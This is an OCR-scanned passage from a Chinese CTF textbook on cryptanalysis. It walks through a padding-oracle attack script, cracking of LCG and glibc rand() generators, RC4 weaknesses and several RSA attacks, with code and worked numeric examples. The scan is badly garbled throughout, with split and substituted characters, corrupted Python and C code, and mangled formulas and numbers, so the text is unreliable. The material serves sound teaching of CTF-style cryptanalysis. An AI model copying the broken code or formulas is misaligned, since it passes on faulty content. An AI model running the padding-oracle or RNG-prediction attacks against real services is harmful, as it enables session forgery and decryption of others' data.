iv, cookie_padded_encrypted, hv # 从 输入 中 读 入 
cookie_padded # 用 用 户 输入 的 iv 解密 的 cookie 
Tr 
okie = unpad(cookie_padded) 
except Exception as e: 
print("Invalid padding") 
continue 
if not is_valid_hash(cookie, hv): 
print("Invalid hash") 
continue 


# 校 验 cookie 的 hv 值 是 否 匹 配 


# 如 果 cookie 中 admin 的 值 为 1， 则 获得 fLag 


设置 admin 标 志 位 的 代码 为 : 


可 以 皮 现 ， 程 序 并 没有 验证 重复 的 key 值 ， 所 以 在 之 前 加 密 的 部 分 后 面 直 接 增加 一 个 admin: 1 的 字符 


串 ， 即 可 把 admin 的 值 设置 为 1。 如 果 没 有 hash 验 证 ， 可 以 直接 修改 iv 的 值 ， 来 让 第 一 块 密 文 解 
结果 中 admin 的 值 变 为 1。 


的 


为 了 使 最 后 1 块 解密 的 明文 中 出 现 admin: 1， 假 设 输 入 的 用 户 名 和 密码 都 是 ?个 a， 可 以 构造 这 样 一 个 
答 入 ， 见 图 7-3-13。 为 了 使 最 后 一 块 的 明文 从 


全 EFEEENWU AAA AAA AAA AL 


人 证 :FFEFEFEEi INRCEA IEAS (IE 


这 个 字符 串 需要 让 前 一 个 块 的 密 文 等 于 ?193 的 值 。 


图 7-3-13 
但 此 时 出 现 了 新 的 问题 ， 我 们 不 希望 第 二 个 块 的 值 被 改变 ， 所 以 需要 继续 修改 第 一 个 块 的 值 ， 如 果 能 
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知道 第 二 个 块 的 密 文 (S1@52) 解密 后 的 值 ， 就 可 以 用 同样 的 方法 修改 第 一 个 块 的 密 文 ， 来 控制 第 二 
个 块 的 明文 。 这 时 是 Padding-Oracle 攻 击发 挥 本 领 的 时 候 了 ， 下 面 是 一 段 获取 last_chunk2 变 量 解 密 
后 的 值 的 脚本 : 


def set_str(s, i, d): 
if i >= 0: 
return s[:i] + chr(d) + s[i+1:] 
else: 
i = len(s) + i 
return s[:i] + chr(d) + s[i+1:] 
Last_chunk2 = xor_str(S1,S2) # 要 获取 解密 结果 的 数据 
res = "" 
random_f = os.urandom(16) # 随机 生成 的 F 
random_f_r = random_f[9:16] 
for i in xrange(9，16): 
for j in xrange(0, QOx100): 
guess = iv + set_str(random_f, 15-i, j) + last_chunk2 
p.sendline(guess.encode('hex') + hv_hex) 
rr = p.recvuntil('Input your cookie:\n') 
if 'Invalid padding' not in rr: 
t = (i+1) ^ ord(random_f[15-i]) ^ j 
res = res + chr(t) 
for k in xrange(0, len(res)): 
random_f=set_str(random_f,-(k+1), (i+2)^ord(res[k])^*ord(random_f_r[15-k])) 
break 
res = xor_str(res[::-1], random_f_r) 


当然 ， 本 题目 不 止 如 此 ， 我 们 需要 计算 出 新 生成 的 cookie 的 hash 值 来 通过 程序 的 验证 ， 后 续 章节 将 会 


讲解 Hash 长 度 扩展 攻击 的 基本 原理 。 注 意 ，Padding-Oracle 攻 击 在 CTF 中 出 现 的 频率 可 能 比 其 他 攻 
击 种 类 多 得 多 ， 所 以 需要 准备 好 对 应 的 脚本 模板 。 
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7.4 流 密 码 


流 密码 (Stream Cipher) 属于 对 称 密码 算法 中 的 一 种 ， 其 基本 特征 是 加 解密 双方 使 用 一 串 与 明文 长 
度 相同 的 密 钥 流 ， 与 明文 流 组 合 来 进行 加 解密 。 密 钥 流 通常 是 由 某 一 确定 状态 的 伪 随 机 数 发 生 器 所 产 
生 的 比特 流 ， 双 方 将 伪 随 机 数 生 成 器 的 种 子 (seed) 作为 密 铀 ， 而 组 合 函 数 通常 为 按 位 异 或 (xor) 
运算 。 流 密码 的 基本 结构 见 图 7-4-1。 


明文 流 密 文 流 


由 于 伪 随 机 数 发 生 器 的 初始 化 为 一 个 一 次 性 过 程 ， 生 成 密 钥 流 是 一 个 很 小 的 开销 ， 故 流 密 码 在 处 理 较 
长 的 明文 时 存在 速度 优势 。 相 对 应 的 ， 流 密码 的 安全 性 几乎 完全 依赖 于 伪 随 机 数 发 生 器 所 产生 数据 的 
随机 性 。 


对 于 一 个 安全 的 发 生 器 ， 一 般 要 求 有 以 下 特性 : 
入 所 产生 随机 数 的 周期 足够 大 。 
令 种 子 的 长 度 足 够 长 ， 以 抵抗 暴力 枚 举 攻击 。 
和 种 子 中 1 位 的 改变 会 引起 序列 的 极 大 改变 (下 衣 效应) 。 
和 产生 的 密 钥 流 能 抵抗 统计 学 分 析 ， 如 频率 分 析 等 。 
令 在 获得 少量 已 知 的 密 钥 流 时 ， 无 法 还 原 整 个 发 生 器 的 状态 。 


本 节 将 介绍 CTF 中 常见 的 线性 同 余生 成 器 、 线 性 反馈 移 位 寄存 器 ， 以 及 基于 非 线性 数组 变换 的 流 密码 
算法 RC4。 
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7.4.1 线性 同 余 生成 器 (LCG) 


线性 同 余生 成 器 (Linear Congruential Generator，LCG) 是 一 种 由 线性 函数 生成 随机 数 序列 的 算 
法 ， 是 一 种 简单 且 易 于 实现 的 算法 。 标 准 的 LCG 的 生成 序列 满足 下 列 递 推 式 : 


X41=(AXnt+ BB modM 
= lb 
从 以 上 公式 中 不 难看 出 ，LCG 的 周期 最 大 为 人 


7.4.1.1 由 已 知 序列 破译 LCG 


在 已 知 M 的 情况 下 ， 由 于 LCG 的 生成 式 为 一 个 简单 的 线性 关系 式 ， 若 能 获取 连续 的 ?2 个， 便 可 建立 一 
个 关于 A 和 A 的 方程 ， 获 取 多 个 x%， 则 可 获得 方程 组 


Xii1=(AX+B modM 


X41=(AxtB modM 


求解 此 万 程 组 ， 即 可 解 出 参数 A 和 OA 


厨 人 未 知 ， 则 需要 较 多 已 知 的 输出 序列 。 由 于 通过 线性 同 余 万 法 得 到 的 数值 一 定 小 于 M， 且 对 于 满足 
周期 为 人 的 序列 是 在 0 ~ M1 沁 围 内 均匀 分 布 ， 通 过 观察 所 有 的 输出 可 以 得 到 人 的 最 小 值 ， 枚 举 大 于 
0 E34 [ET: DL /dP ES DD ma WE) A =ESl| Ea] 


的 输出 通过 验证 。 因 为 均匀 分 布 ， 枚 举 量 不 会 太 大 。 


【 例 7-4-1】VolgaCTF Quals 2015 ， 题 目 提供 了 一 个 加 密 脚本 和 一 个 被 加 密 的 PNG 文 件 。 加 密 脚 本 
如 下 : 


import struct 
import os 


M = 65521 
class LCG(): 
def __init__(self, s): 
self.m=M 
(self.a, self.b, self.state) = struct.unpack('<3H', s[:6]) 


def round(self): 
self.state = sod + self.b) % self.m 
return self.s 


es pa Length) : 
1) 


def e di ata, key): 
rt(Llen(ke 下 = 6) 
i cg = LCG(ke 
a 二 ey rate_gamma(len(data)) 
A rr i hr(d ^ g) for d, g in zip(map(ord, data), map(ord, gamma))]) 
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def decrypt(ciphertext, key): 
return encrypt(ciphertext, key) 


def gt 
并 。， 


if __name__ __main__' 

with open nC Fi ag.png', ‘rb ) as f: 
data = f.read() 

key = os.urandom(6) 

enc_data = encrypt(data, key) 

with open('flag.enc.bin', 'wb+') as ff: 


可 以 看 到 |， 脚本 中 对 于 flag png 进 行 了 了 流 密码 加 密 ， 由 


可 知 ， 对 于 密 负 流 的 使 用 是 每 次 产生 的 数字 以 小 六 前 序 打包 为 2 字 节 整数 ， 再 与 明文 进行 异 或 后 加 密 。 
使 用 的 密 钥 流 由 LCG 产 生 ， 其 中 模 数 必 包 经 给 出 ， 为 62521， 而 系数 4 和 单数 2 没有 给 出 ， 通过 
攻击 来 获取 。 


已 知 被 加 密 的 为 一 张 PNG 图 片 ， 而 PNG 图 片 的 起 始 8 字 
89 50 4E 47 0D 0A 1A 0A 

便 可 以 进行 已 知 明 文 攻击 。 读 取 flag.enc.bin 的 前 8 字 节 ， 得 到 以 下 数据 : 
99 CE 83 E9 5D E0 D8 E0 

将 数据 分 别 拆 成 2 字 节 小 端 序 数 ， 便 可 获得 以 下 明 密 文 对 : 
(Ox5089,0xCE99) 
(0x474E,0xE983) 
(OxO0AOD,0xEO0SD) 
(0x0A1A,O0xE0D8) 

分 别 进行 异 或 ， 可 以 获得 密 钥 流 中 的 前 4 个 值 : 


40464,44749,59984,60098 


由 于 未 知 量 有 和 A”B8， 可 以 选取 3 个 连续 的 密 钥 数 值 进行 计算 。 选 取 % =40464，»=44749， 加 = 


2998 
， 代 入 生成 式 ， 得 到 


44749=(Ax40464+B)mod65521 
59984=(Ax44749+B)mod65521 


式 (7-4) 又 (7-3) ,得 


15235=(AxX4285)mod 65521 
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对 式 (7-5) 求解 同 余 方程 ， 得 

A=44882mod65521 
代入 式 (7-3) ， 解 得 

读 50579mod65521 
a VAN= :3 


40464=(44882xMh+50579) mod65521 


ME=37388mod65521 


化 为 2 字 节 小 端 序 数 ， 得 到 6 字 忆 的 key 为 : 
52 AF 93 C5 0C 92 


将 密 钥 蔡 换 进 源 程 序 ， 由 于 加 密 米 用 异 或 操作 ， 故 只 需 再 进行 一 次 异 或 即 可 解密 。 


#!/usr/bin Wt 
__name__ __main__ 
with open nC flag.png. bin， mo) as fs 
data = f.read() 
key = '\x52\xaf\x93\xc5\xOc\x92' 
c_data crypt(data, key) 
人 open fLag .png' ) as f: 
f.write(enc_dat | 


解密 获得 如 图 7-4-2 所 示 的 flag 图 片 ， 即 解密 成 功 。 
{linear_congruential generator _isn't good for_crypto} 
图 7-4-2 
一 般 情况 下 ， 式 (7-5) 的 方程 不 一 定 有 解 。 本 例 中 的 模 数 MM= 65521 为 一 个 素数 ， 即 对 于 任意 正 整数 
1~65520,， 均 存 在 对 人 的 逆 元 。 知 过 到 逆 元 不 仔 在 的 情况 ， 我 们 需要 重新 选取 已 知 明文 进行 攻击 。 


7.4.1.2 攻破 Linux Glibc 的 rand(0 函 数 -1 


Linux GNU C library 中 的 rand() 尔 数 的 实现 如 下 : 


int __random_r (struct random_data *buf, int32_t x*result) { 
int32_t *state; 
if (buf == NULL || result == NULL) 
goto fail; 
state = buf->state; 
if (buf->rand_type == TYPE_9 
int32_t val = ((state[0] * 1103515245U) + 12345U) & 9x7fffffff; 
state[0] = val; 
*result = val; 
] 
else { 


1 
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} 


可 以 看 到 ， 当 使 用 rand type_0 时 ， 采 用 的 是 标准 的 LCG 算 法 ， 生 成 公式 为 


5F(1103515245xs:1+12345) mod2147483648 


显然 ， 当 捕获 到 一 个 其 产生 的 随机 数 时 ， 便 可 通过 递 推 式 预 测 出 后 产生 的 所 有 随机 数 。 Sl ee Sy 
与 2147483648 互 素 ， 可 求 得 逆 元 1857678181,， 有 


si1=(Sr12345)x1857678181mod2147483648 


从 而 实现 随机 数 序 列 的 向 前 恢复 。 


由 于 此 方法 的 安全 性 过 低 ， 目 前 Glibc 中 提供 的 初始 化 函数 srand0 已 经 弃 用 了 TYPE_0， 而 时 使 用 ， 
_3。TYPE_ 3 攻破 的 方法 将 企 7.4.2 节 中 介绍 。 


全 


移 位 寄存 器 (Shift Register) 是 数字 电路 中 常见 的 一 种 器 件 ， 可 以 并 行 输入 奉 干 位 进行 初始 化 ， 并 
可 进行 移入 、 移 出 等 操作 ， 瘦 锐 用 于 严 生 序 记 信号 。 当 产生 的 序 刘 信号 随机 性 足够 强 时 ， 即 可 满足 流 
密码 中 产生 密 钥 流 的 需求 。 密 码 学 中 常用 的 是 线性 反馈 移 位 寄存 器 (LFSR) ， 它 由 一 个 移 位 麻 存 器 、 
一 个 反馈 函数 组 上 成， 反馈 函数 为 一 个 线性 函数 。 进 行 密 钥 流 生成 时 ， 每 次 从 移 位 寄存 器 中 移出 一 位 作 
为 当前 的 结果 ， 而 移入 的 位 由 反馈 立 数 对 寄存 器 中 的 某 些 位 进行 计算 来 确定 。LFSR 的 基本 结构 见 图 7- 
4-3。 


图 7-4-3 


为 了 使 LFSR 获 得 最 大 的 周期 ， 即 n 位 的 LFSR 获 得 2"-1 的 周期 ， 对 于 反馈 函数 F 的 选取 有 以 下 方法 : 选 
取 GF (2) 上 的 一 个 n 次 的 本 原 多 项 式 ， 当 n=32 时 ， 选 取 


X34+x/ /+x +Xx3+x<+x+1 
那么 可 以 得 到 F 国 数 为 


F=s32B57BS5DBS3DPDSI P51 
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即 移入 位 由 寄存 器 中 第 32、7、5、3、2、1 位 异 或 而 成 。 这 种 周期 最 大 的 序列 被 称 为 m 序 列 。 


7.4.2.1 由 已 知 序列 破译 LFSR 


设 LFSR 长 度 为 n 位 ， 当 已 知 其 长 度 为 2n 的 输出 时 ， 若 方程 组 有 解 ， 即 可 通过 解 线性 方程 组 来 完全 获得 
LFSR 的 反馈 函数 ， 从 而 破译 LFSR。 例 如 ， 考 虑 4 位 某 未 知 LFSR， 获 取 输 出 序列 为 10001010， 由 于 异 
或 等 价 于 模 2 加 法 ， 即 可 列 出 下 列 线性 方程 组 : 


la TO0a +0a, 0 三 mod 2 
Oo。 
EU EUOE 
Da Flo Oo Ee lo = Lmod> 


解 方程 组 ， 可 得 


那么 ， 即 可 求 得 反馈 函数 为 : 


即 可 完全 预测 此 LFSR 的 序列 。 


7.4.2.2 攻破 Linux glibc 的 rand() 函 数 -2 


__random_r (struct random_data x*buf, int32_t x*result) { 
int32_t x*xstate; 
if (buf == NULL || result == NULL) 

goto fail; 


state = buf->state; 
if (buf->rand_type == TYPE_0) { 
ws /* 前 文 TYPE_9 代码 */ 
} 
else { 
int32_t *fptr = buf->fptr; 
int32_t *rptr = buf->rptr; 
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int32_t *end_ptr = buf->end_ptr; 
uint32_t val; 
val = x*fptr += (uint32_t) *rptr; 
/* Chucking least random bit */ 
*result = val >> 1; 
++fptr; 
if (fptr >= end_ptr) { 
fptr = state; 
++rptr; 
else { 
Ee 
if (rptr >= end_ptr) 
rptr = State; 
} 
buf->fptr = fptr; 
buf->rptr = rptr; 
} 
return 0; 
fail: 
__set_errno (EINVAL); 
return -1; 


这 种 产生 下 一 个 随机 数 的 万 dn EN SS | 
类 似 线 性 反馈 的 生成 万 法 。 在 TYPE_3 的 情况 下 ， 这 个 状态 数组 的 长 度 为 344， 而 fptr 和 和 rptr 分 别 为 当 
天 下 标 减 31 和 当前 下 标 减 3， 那 么 产生 下 一 个 随机 数 的 为数 实际 上 是 如 下 线性 反馈 了 














主题 ， 移 入 状态 数组 中 的 数 并 不 是 产生 的 随机 数 ， 而 是 在 右 移 1 位 前 的 数 ， 林 位 存在 0 和 1 两 种 情 ) 
了 这样 我 们 获取 32 组 随机 数 后 ， 同 下 预测 的 下 一 个 数 会 以 25% 的 概率 仔 企 1 的 误差 ， 且 误 老 会 随 着 预测 
效 的 增多 而 增 大 。 不 过 ， 大 部 分 情况 下 并 不 需要 预测 六 多 ，1 的 误差 已 经 足够 使 用 ， 而 且 如 果 能 够 继 
续 获 取 随 机 数 ， 那 么 可 以 一 边 预 测 一 边 修 正 ， 减 少 误 产 。 


一 边 预 测 一 边 修 正 随 机 数 的 简单 pemo: 


#include <stdio.h> 
#include <stdlib.h> 
#include <time.h> 


int main() { 
int s[256] = {6}, i = 9; 
srand(time(0)); 


for (i = 0; i < 32; i++) { 
s[i] = rand() << 1; 
} 
for (i = 32; i < 64; i++) { 
s[i] = s[i - 3] + s[i - 31]; 
int xx = (unsigned int)s[i] >> 1; 
int yy = rand(); 
printf("predicted %d, actual %d\n", xx, yy); 
if (yy - xx == 1) { 
s[i-3]++; 
s[i-31]++; 
s[i] += 2; 
} 
} 


return 0; 


/1.4.3 RC4 


RC4 是 一 种 特殊 的 流 加 密 算法 ，1987 年 由 Ronald Rivest 提 出 。RC4 是 有 线 等 效 加 密 (WEP) 中 采用 
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的 交流 冯 |， 的 扩 saeg i 和 和 


RC4 算 法 的 伪 代 码 (来 目 维基 百科 ) 如 下 。 盏 先 ， 根据 输入 的 密 钥 初 始 化 5 使。 


for( i=0 ; i<256 ; i++) 
j := (j + S[i] + key[i mod keylength]) % 256 
swap values of S[i] and S[j] 

endfor 


然后 每 输入 1 字 节 ， 束 做 一 次 S 爹 奉 换 操作 ， 并 输出 1 字 市 流 密 钥 与 明文 异 或 : 


i:=0 
j:=0 
while GeneratingOutput: 
i := (i + 1) mod 256 
j := (j + S[i]) mod 256 
swap values of S[i] and S[j] 
k := inputByte ^ S[(S[i] + S[j]) % es 
output K 
endwhile 


显然 ，RC4 算 法 作为 一 种 流 密 码 算 法 ， 也 易 受 到 已 知 明文 攻击 的 影响 。 如 果 使 用 菏 一 密 钥 加 密 了 n 字 
厂 的 数据 ， 并 知道 明文 ， 即 可 恢复 n 字 市 的 流 密 钥 ;， 如 果 同 一 密 钥 补 重复 使 用 ， 那 么 截获 密 文 即 可 解 

得 相应 的 明文 。 实 际 攻 击 的 过 程 中 ， 经 常 通过 一 些 可 预测 的 内 容 来 宪 试 已 知 明文 攻击 ， 如 HTTP 报 文 
的 头 部 等 。 


特别 地 ， 当 输入 的 key 为 [0，0，255，254，253，.…，2] 时 ， 由 模 的 运算 性 质 可 以 发 现 S 盒 替换 过 


程 相当 于 没有 蔡 换 ， 那 么 输出 的 流 密 钥 即 确定 的 S[ (2*i) %256]， 重 复 周 期 非 单 矶 。 另 外 ， 有 尝 密 
钥 属 于 弱 密 铀 ， 也 会 在 很 矶 的 长 度 内 产生 重复 的 密 钥 尝 ， 所 以 在 实际 使 用 RC4 算 法 时 ， 需 要 事先 对 密 
钥 进行 测试。 
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7.5 公 钥 密码 


7.5.1 公 角 密码 向 介 


目 从 科 克 电 夫 原则 和 对 称 加 密 体 制 被 提出 后 ， 密 码 学 进入 了 现代 密码 阶段 。 成 熟 的 分 组 密码 、 流 密码 
的 加 密 强度 和 加 密 效 率 都 非 党 优秀， 然而 对 称 密码 体系 存在 着 一 个 不 可 忽略 的 问题 一 一 密 钥 的 传输 需 
Ed e341: =U = NS A a 5] 
解决 信息 的 认证 与 不 可 否认 性 的 问题 。 基 于 以 上 事实 ，1976 年 ，Whitfield Diffie 和 Martin Hellman 
发 表 了 New directions in cryptography 这 篇 划时代 的 文章 ， 葛 定 了 公 和 钥 密 码 系 统 的 基础 ， 而 在 

年 ，Ron Rivest、Adi Shamir 和 Leonard Adleman 发 明了 一 种 直到 今天 还 被 广泛 运用 的 公 钥 密码 
算法 一 一 RSA。 


公 钥 密码 (Public Key Cryptography) ， 又 称 为 非 对 称 密码 ， 其 最 大 特征 是 加 密 和 解密 不 再 使 用 
相同 的 密 钥 ， 而 使 用 不 同 的 密 钥 。 使 用 者 会 将 一 个 密 钥 公 开 ， 而 将 男 一 个 密 钥 私 人 持 有 ， 这 时 这 两 个 
密 钥 被 称 为 公 铀 和 私 铀 。 一 般 来 说 ， 公 铀 和 私 钥 是 难以 互相 计算 的 ， 但 它们 可 以 互相 分 别 作为 加 密 密 
钥 和 解密 密 钥 。 当 信息 发 送 者 选择 及 用 接收 者 的 公 钥 加 密 时 ， 接 收 者 收 到 信息 后 使 用 自己 的 私 钥 解 
密 ， 这 样 便 可 保持 信息 的 机 密 性 ; 名 信息 友 送 者 使 用 目 己 的 私 钥 对 信息 摘要 进行 加 密 ， 接 收 者 使 用 友 
送 者 的 公 钥 对 摘要 进行 验证 ， 即 可 起 到 签名 的 作用 ， 可 以 保证 信息 的 认证 性 和 不 可 否认 性 。 


在 CTF 中 常见 的 公 钥 密码 算法 为 RSA 算 法 ， 这 是 CTF 参 赛 者 必须 掌握 的 基础 知识 ， 还 会 涉及 一 些 关 于 


离散 对 数 和 椭圆 曲线 的 算法 。 


7.2.2 RSA 


7.5.2.1 RSA 简 介 


RSA 算 法 是 目前 工程 中 使 用 最 广泛 的 公 钥 密 码 算法 ， 算 法 的 安全 性 基于 一 个 简单 的 数学 事实 : 对 于 大 
素数 AP 和 和 9， 计算 7=Dx 9 非常 简单 ， 但 是 在 已 知 /的 情况 下 分 解 因子 得 到 jp 和 4q 则 相当 困难 。 


RSA 的 基本 算法 如 下 : 选取 较 大 的 素数 / 折 1qg (一 般 大 于 ?12bit， 且 /不 等 于 9) ， 计 算 
n=pxg 
求 / 榴 欧 拉 函 数 
Hn)=AP)x Hq9)=(p-1)x(q91) 
选取 一 个 与 (m) 互 质 的 整数 e， 求 得 ed 模 g9 (]m) 的 逆 元 d， 即 
exq=1modg(n) 


DU SVN IIL DL DE dN AN: NES 
数 ， 如 65537。 


设 /为 明文 ，( 为 密 文 ， 加 解密 满足 如 下 操作 : 


c=m" modn 本 


d 
m=c" modn 
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该 加 解密 算法 的 正确 性 证 明 如 下 。 

因为 cme modm， 所 以 camodm= mecmodm。 

又 因为 eqE1modg (nn) ， 所 以 可 设 eqE1+kgp (n) ， 其 中 的 非 负 整 数 。 

当 m 与 7 不 互 质 时 ， 由 于 0<m<n， 则 /m=hp 或 m=hg. 

设 m=hp， 由 于 p 与 9 为 两 个 不 同 的 素数 且 k< 9， 故 人 与 号 质 ， 由 欧 拉 定理 ， 得 
(hp)9F l=1modg 


两 边 同 时 乘 以 hp， 并 整理 得 到 


[((hDFKAP Tx ppshpmodg 


(hp) P(N +1=hpmodg 


(hp) Ehpmodg 


(hD eo-hp=tq 
由 于 左 式 可 以 提取 因子 p 且 9 为 素数 ， 故 本 定 可 以 被 / 碎 除 ， 从 而 
(hp)eo=/pq+ hp 
因为 m=hp，n=pq， 所 以 me0= n/m， 从 而 
meo=mmodn 


当 /m 与 7 吾 质 时 ， 由 欧 拉 定 理 ， 可 得 


1 modn=m"*’Y modn=mxm’" modn 
=mxl modn 
=m 


综 上 ， 得 证 。 


一 般 ，CTF 中 RSA 相 关 的 题目 会 给 出 加 密使 用 的 公 钥 或 加 密 脚 本 、 加 密 所 得 的 密 文 ， 要 求 参 赛 者 计算 
正确 的 明文 。 有 时 RSA 会 与 其 他 方向 结合 起 来 考察 ， 包 括 但 不 限于 放 在 被 逆向 的 程序 中 或 与 流量 分 析 
结合 等 。 计 算 RSA 时 会 涉及 大 整数 的 高 精度 运算 ， 推 荐 使 用 Python 语言 来 编写 脚本 ， 并 使 用 高 精度 计 
算 库 gmpy2 或 Python 数学 扩展 Sagemath。 


7.5.2.2 RSA 的 常见 攻击 
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1. 因 式 分 解 


由 于 RSA 的 私 钥 生 成 过 程 中 只 用 到 了 p、9 与 6 如果 p、 9 被 成 功 求 出 ， 那 么 可 使 用 正常 的 计算 方法 将 
私 钥 模 数 < 算出。 如 果 / 的 大 小 不 太 大 (不 大 于 512 位 ) ， 建 议 先 行 尝试 因 式 分 解法 。 因 式 分 解 时 常用 
的 辅助 工具 有 SageMath、Yafu， 以 及 在 线 因 子 查询 网 站 factordb。 


另外 ， 知 和 9 的 差距 非 钟 小 ， 由 于 


即 可 通过 暴力 枚 举 2-9 的 值 来 分 解 29。 


例如 ， 对 于 RSA 公 钥 <n，e>=<16422644908304291，65537>， 由 于 /的 值 较 小 ， 可 以 考虑 使 用 因 
式 分 解 的 方法 。 使 用 Yafu 执 行 factor (16422644908304291) ， 得 到 以 下 输出 : 


>> factor(16422644998304291) 


fac: factoring 16422644908304291 

fac: using pretesting plan: normal 

fac: no tune info: using qs/gnfs crossover of 95 digits 
div: primes Less than 10000 

rho: x^2 + 3, starting 1000 iterations on 

rho: x^2 + 2, starting 1006 iterations on 

rho: x^2 + 1, starting 1000 iterations on 

Total factoring time = 0.0092 seconds 


*xxfactors found*xx 


P9 = 134235139 
P9 = 122342369 


ans = 工 


从 而 得 到 两 个 素数 AP 和 9 分 别 为 134235139 和 122342369。 使 用 Gmpy2 Python 库 可 以 计算 出 私 钥 C 
的 值 。 


>>> p = 122342369 
>>> q = 134235139 


>>>n=p*q 

>>> e = 65537 

>>> phi = (p-1) * (q-1) 

>>> d = gmpy2.invert(e, phi) 
d 


>>> 
mpz(8237257961622977) 


2. 低 加 密 指数 小 明文 攻击 


如 果 被 加 密 的 7 非常 小 ， 而 且 e 较 小 ， 导 致 加 密 后 的 c 仍 然 小 于 n， 那 么 便 可 对 密 文 直接 开 6e 次 方 ， 即 可 
获得 明文 /m。 例 如 ， 考 虑 以 下 情况 : 7=100000980001501，e=3，/m=233， 那 么 pow (/m，@) 了 
， 仍 然 小 于 7m。 此 时 ， 对 12649337 开 3 次 方 即 可 解 出 明文 233。 


如 果 加 密 后 的 < 昌 然 大 于 /但 是 并 不 太 大 ， 由 于 pow (mm，e)j =kn+c， 可 以 暴力 枚 举 Kk， 然 后 开 e 次 
方 ， 直 到 e 次 方 可 以 开 尽 ， 解 出 了 正确 的 为 止 。 例 如 ， 当 /0e 与 上 式 相 同 , 但 /=233333 时 ， 有 < 
(m, é, Nn) =3524799146410。 


使 用 Python 枚 举 / 的 系数 人 的 代码 如 下 : 


>>> n = 100000980001501 


>e=3 
>>> c = 3524799146410 


>>> k=0 
>>> while (gmpy2.iroot(c + k * n, e)[1] == False): 
k+=1 


Tr. 2 ， gmpy2.iroot(c + k * n, e)[9] 
127 12703649259337037 233333 


可 以 看 到 ， 当 枚 举 到 k=127 时 ，3 次 方 可 以 开 尽 ， 解 得 明文 为 233333。 
3. 共 模 攻击 


如 果 使 用 了 相同 的 m， 不 同 的 模 数 el]、ep， 且 el、e 互 素 ， 对 同一 组 明文 进行 加 密 ， 得 到 密 文 G、 < 
2， 那 么 可 以 在 不 计算 私 钥 的 情况 下 计算 出 明文 /m。 设 
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由 于 el、e@2 互 素 ， 那 么 
(= 了 =A 


其 中 X_ J 林 以 由 扩展 欧 几 里 得 算法 解 出 。 由 上 了 式 可 以 得 到 


六 已 Modn=m Xm modn=m modn=m 


即 解 得 明文 。 


例如 ， 考 虑 以 下 情况 : 
EE 
21247716666082165009723327736827271181397595459782678430106761351 


EEY/ 
e2=100003 


m=23333333333333333333333333 


吉隆 
18887564582487144429813257569011655623836310193226497811174858766355 


(ep A 
20606080979023683286301324839323159515999485609783974066646158762676 


显然 ， 对 相同 的 m 使 用 同一 个 n 和 不 同 的 e 加 密 得 到 了 不 同 的 C， 且 两 个 e 互 素 ， 可 以 党 试用 共 模 攻击 的 
方法 解 出 m。 


首先 ， 使 用 扩展 欧 几 里 得 算法 求 出 xe1+ye2=1 中 的 x 和 y: 


>>> g, x, y = gmpy2.gcdext(el, e2) 


>>> x, y 
(mpz(-20737), mpz(13590)) 


然后 计算 GC. > Ge modn: 


n) * pow(c2, y, n)%n 
mpz(23333333333333333333333333L) 


即 可 在 不 分 解 n 的 情况 下 解 得 明文 m。 由 于 扩展 欧 几 里 得 算法 的 时 间 复 洒 度 为 O(logn) ， 在 n 非 常 大 
时 ， 该 方法 仍然 可 用 。 


在 CTF 中 ， 如 果 遇 到 只 有 一 组 明文 但 被 多 个 e 加 密 得 下 了 多 个 密 文 的 情况 ， 应 该 先 考 虑 使 用 共 模 攻击 。 
4. 广播 攻击 
对 于 相同 的 明文 m， 使 用 相同 的 指数 e 和 不 同 的 模 数 nh1，n2，…，ni， 加 密 得 到 i 组 密 文 时 (i2e) ， 可 


以 使 用 中 国 剩余 定理 解 出 明文 。 设 


¢ Pr n 


| "二 7 
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be | FE LE ob 


I 


c,=m modn, 


联 立 方程 组 ， 使 用 中 国 剩余 定理 ， 可 以 求 得 一 个 cx 满足 


= 4: A = du: ey 
对 cx 开 e 次 方 ， 可 以 解 出 明文 m。 


考虑 以 下 情况 : 


n1= 
15531155256715702473857617704486808708718149144340218293989572553 
4665876664449238167503227140673941051177208287344383452644505383 


n3= 
21183715744016961916768204882841616031088804561756503460509763179 


e=3 

m=23333333333333333333333333333333333333333333 
c1=3545246357420027751080801513596354805792507454079198980994208613 
c2=2707010410568402623621857261477803260225040847370109587024036966 
c3=9988366267699268191504634643058847989157961583452909799090445547 


下 面 尝试 使 用 广播 攻击 来 解 出 n。 联 立 三 个 方程 组 ， 使 用 中 国 科 作 定 理 (中 国 剩余 定理 的 代码 来 自 
Rodd [elele [Ss 
Wiki) : 


sum += a_i * gmpy2.invert(p, n_i) *p 
return sum % prod 


n= [nl1, n2, n3] 

es [el, c2, €3] 

x = crt(c, n) 

print gmpy2.iroot(x, e) 

# (mpz(23333333333333333333333333333333333333333333L)，True) 


可 以 看 到 ， 我 们 成 功 解 出 了 明文 。 


在 CTF 中 ， 若 看 到 使 用 相同 的 e 不 同 的 n 进 行 了 多 次 加 密 且 e 较 小 ， 密 文 组 数 不 小 于 e 组 ， 应 当 考 虑 使 用 
此 万 法 。 
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5. 低 解密 指数 攻击 (Wiener's Attack) 
1989 年 ，Michael J.Wiener 发 表 了 Cryptanalysis of Short RSA Secret Exponents 文 章 ， 提 出 了 
一 种 针对 解密 指数 d 较 低 时 对 于 RSA 的 攻击 方法 ， 访 方法 基于 连 分 数 (Continued Fraction) 。 
提出 ， 设 ed=1+kp (n) ， 当 q< p < 2gq 时 ， 若 满足 


Wiener 


则 通过 搜索 连 分 数 e/N 的 收敛 ， 可 以 有 效率 地 找到 k/d， 从 而 恢复 正确 的 d。 
目前 ， 对 于 此 种 攻击 已 有 完备 的 实现 ， 在 GitHub 上 的 https://github.com/pablocelayes/rsa- 


wiener 
-attack 库 中 可 以 找到 完整 可 用 的 攻击 人 代码。 例如， 考虑 以 下 RSA 公 钥 : 


nn 三 
1254669541286774112800350345370909838892196173691617426023040329852908193564023067943 


GE 
2702993571650777060698579724900044231559809907862476240831366414804737810584549617 


使 用 以 上 攻击 代码 ， 修 改 RSAwienerHacker.py 中 的 公 钥 为 上 述 公 钥 : 


# ein,d = RSAvuLnerabLeKkeyGenerator .generateKkeys(1624) 

# 将 以 上 这 行 注释 掉 

en = 270299357165867770606985797249090044231559809967862476246831366414864737819584549617， 
154669541286774112860935934537699983889219617369161742692364093298529608193564023067943 


运行 后 ， 可 以 成 功 解 出 d: 
d=246752465 


在 CTF 中 ， 若 提供 的 公 钥 的 e 非 常 大 ， 那 么 由 于 ed 在 乘积 时 地 位 对 等 ，d 的 值 很 可 能 较 小 ， 应 该 尝试 本 
万 法 。 


6. Coppersmith's High Bits Attack 


本 方法 由 Don Coppersmith 提 出 ， 如 果 已 知 明文 的 很 大 部 分 ， 即 m=mo+X， 已 知 mo 或 组 成 n 中 一 个 


